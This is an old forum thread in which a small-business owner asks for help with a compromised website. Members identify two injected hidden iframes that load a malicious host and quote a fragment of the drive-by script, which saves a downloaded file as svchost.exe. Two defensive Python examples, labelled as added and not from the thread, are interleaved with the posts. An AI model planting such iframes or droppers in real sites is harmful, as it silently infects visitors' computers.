The 75 and ZT Owners Club Forums


martin1973 16th April 2007 18:33

Urgent help regarding malware virus on website
 
Hi

I have my own business and website www.goosemirecottages.co.uk and received the following email:

-
Hi
I am looking for accommodation in the Lake District and landed on your web
site. The following link
http://www.goosemirecottages.co.uk/s...pertyID=447176
resulted in a virus report from 2 different anti-virus products. The file in
question is hker[1].htm. The suspected virus is called Exploit-MS06-014
(Trojan).
Any thoughts?
Regards
Tony
--

Anyway, I checked the link and there is a virus which Kaspersky picks up, but it seems to be on all of the site's pages.

Could the email have been a hoax and downloaded a virus onto the site? Any other idea how a virus could be put onto the site, and how could it be removed?

Thanks for your help

Rich 16th April 2007 18:55

Not picking up any virus warnings from that URL (that doesn't mean to say that it's "clean" though).

One thing to note straight away, the site is open to SQL injection and therefore anything is possible.

Get it secured asap Martin!

GreyGhost 16th April 2007 19:01

Not really familiar, but would you expect to see these two lines of code on your home and other pages?

<iframe src=http://www.goldunix.com/xiao/index.htm widht=0 height=0></iframe>
<iframe src=http://www.goldunix.com/hker.htm widht=0 height=0></iframe>

Rich 16th April 2007 19:01

And slightly off topic, did you know that kate@netizen is getting a copy of every "contact us" form filled in?

Rich 16th April 2007 19:03

Quote:

Originally Posted by Grey Ghost (Post 49516)
Not really familiar, but would you expect to see these two lines of code on your home and other pages?

<iframe src=http://www.goldunix.com/xiao/index.htm widht=0 height=0></iframe>
<iframe src=http://www.goldunix.com/hker.htm widht=0 height=0></iframe>

Gotta love Firefox, that's why I wasn't seeing anything bad :)

FYI Martin, the hker.htm file tries to do some very naughty things:

Quote:

fname1="svchost.exe"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
S.open
fname1= F.BuildPath(tmp,fname1)
S.write x.responseBody
S.savetofile fname1,2
S.close

GreyGhost 16th April 2007 19:06

Would deleting those lines resolve the problem?

Safari BTW. :)

Rich 16th April 2007 19:09

Quote:

Originally Posted by Grey Ghost (Post 49521)
Would deleting those lines resolve the problem?

Sure would, those two lines are calling the malware scripts from the goldunix.com site.

Any number of ways your site could have become infected Martin, but I'd start by first securing the SQL vulnerabilities as people can inject anything they want to your site currently :(

Safari ;)
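Rich's advice above is to fix the SQL injection first. As an added illustration that is not from the thread (the site's real code and database are not shown, so the table and rows below are constructed), here is what that fix looks like in Python with sqlite3 for a lookup of propertyID, the parameter visible in the infected URL: first the unsafe pattern, then the same lookup with input validation and a bound parameter.

```python
import sqlite3

# Constructed in-memory stand-in for the booking database; the real schema is unknown.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE property (propertyID INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO property VALUES (?, ?)",
                     [(447176, "Goosemire Cottage"), (447177, "Barn Cottage")])
    return conn

def lookup_property_vulnerable(conn, property_id):
    # Pattern to avoid: the request parameter is pasted straight into the SQL text,
    # so whatever a visitor sends in the URL becomes part of the query itself.
    sql = "SELECT name FROM property WHERE propertyID = " + property_id
    return [row[0] for row in conn.execute(sql)]

def lookup_property_safe(conn, property_id):
    # Reject anything that is not a plain integer, then bind the value as a
    # parameter so the database treats it as data and never as SQL.
    if not property_id.isdigit():
        raise ValueError("propertyID must be numeric")
    rows = conn.execute("SELECT name FROM property WHERE propertyID = ?",
                        (int(property_id),))
    return [row[0] for row in rows]

if __name__ == "__main__":
    db = make_db()
    print(lookup_property_safe(db, "447176"))
```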

GreyGhost 16th April 2007 19:11

In any event keep a clean copy to upload and replace the current one if this or any other problem occurs.

martin1973 16th April 2007 19:20

Can i have a swear filter switched on briefly? :mad: Some spotty gimp will have been sat at home with his porn mags and flask of orange juice all night hatching this evil plan, they should cut their hands off!

Rant over for now...

Thanks for the replies guys

Rich - what is SQL injection and how do you secure the site from this?
(have checked on laptop and got Dad to check site on his PC and all get the same virus warning, all PCs are running Kaspersky, but it can't just be a virus on my system, it must be within the site pages)

--
GreyGhost - no, those lines of code shouldn't be on the pages; when I go onto the site a Kaspersky warning window pops up with malware - Exploit.JS.ADODB.Stream.y
file - http://www.goldunix.com/hker.htm

Which explains the lines of dodgy text you noticed referring to goldunix

--
Rich - yes, Netizen were the original site designers; they get a copy of all enquiry forms so nothing to worry about there (came in handy as when I was with AOL a few years ago they were filtering out loads of the enquiries thinking they were spam emails, in 3 weeks I hadn't received over 100 enquiries, so soon booted AOL out. AOL spam filters see email addresses like [email protected] or [email protected] as spam)

-
Rich again :lol: What exactly are the files trying to do?

--

OK, so any idea guys how I remove the nasties, and also any idea how they got on the site in the first place and how it can be made more secure?

GreyGhost 16th April 2007 19:32

Either download the site and delete both lines of code from each page, then upload again replacing the live site.
Or remove the live site altogether and upload your backup clean copy of your site.
It is those two lines that are compromising your site.

Rich will advise on protection.
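The clean-up GreyGhost describes is to find and delete the two injected iframe lines on every page. As an added example that is not from the thread, this Python script does that check over a page: it flags iframes that are zero-sized (including the "widht" misspelling seen in the injected lines) and point off-site, and strips only those, leaving any legitimate same-site iframe alone. The sample page, the site hostname and the legitimate iframe are constructed for the example.

```python
import re
from urllib.parse import urlparse

# Constructed sample of an infected page, modelled on the two lines quoted in the thread.
INFECTED_PAGE = """<html><head><title>Goosemire Cottages</title></head>
<body>
<h1>Accommodation</h1>
<iframe src=http://www.goldunix.com/xiao/index.htm widht=0 height=0></iframe>
<iframe src=http://www.goldunix.com/hker.htm widht=0 height=0></iframe>
<iframe src="/maps/embed.htm" width="400" height="300"></iframe>
</body></html>"""

SITE_HOST = "www.goosemirecottages.co.uk"  # the site's own hostname (assumed)

IFRAME_RE = re.compile(r"<iframe\b[^>]*>.*?</iframe>", re.IGNORECASE | re.DOTALL)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
# Zero-sized attributes; "widht" covers the misspelling present in the injected lines.
HIDDEN_RE = re.compile(r"""\b(?:width|widht|height)\s*=\s*["']?0\b""", re.IGNORECASE)

def is_suspicious_iframe(tag, site_host):
    """True if the iframe loads from another host and is hidden by a zero size."""
    m = SRC_RE.search(tag)
    if not m:
        return False
    host = urlparse(m.group(1)).hostname  # None for relative URLs
    external = host is not None and host.lower() != site_host
    return external and bool(HIDDEN_RE.search(tag))

def scan_page(html, site_host=SITE_HOST):
    """Return the src URLs of hidden off-site iframes found in the page."""
    return [SRC_RE.search(t).group(1)
            for t in IFRAME_RE.findall(html) if is_suspicious_iframe(t, site_host)]

def clean_page(html, site_host=SITE_HOST):
    """Return the page with suspicious iframes removed; legitimate ones stay."""
    return IFRAME_RE.sub(
        lambda m: "" if is_suspicious_iframe(m.group(0), site_host) else m.group(0), html)

if __name__ == "__main__":
    for src in scan_page(INFECTED_PAGE):
        print("hidden off-site iframe:", src)
```

Run it over every downloaded page and diff the cleaned output against the original before uploading, so nothing but the injected lines changes.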

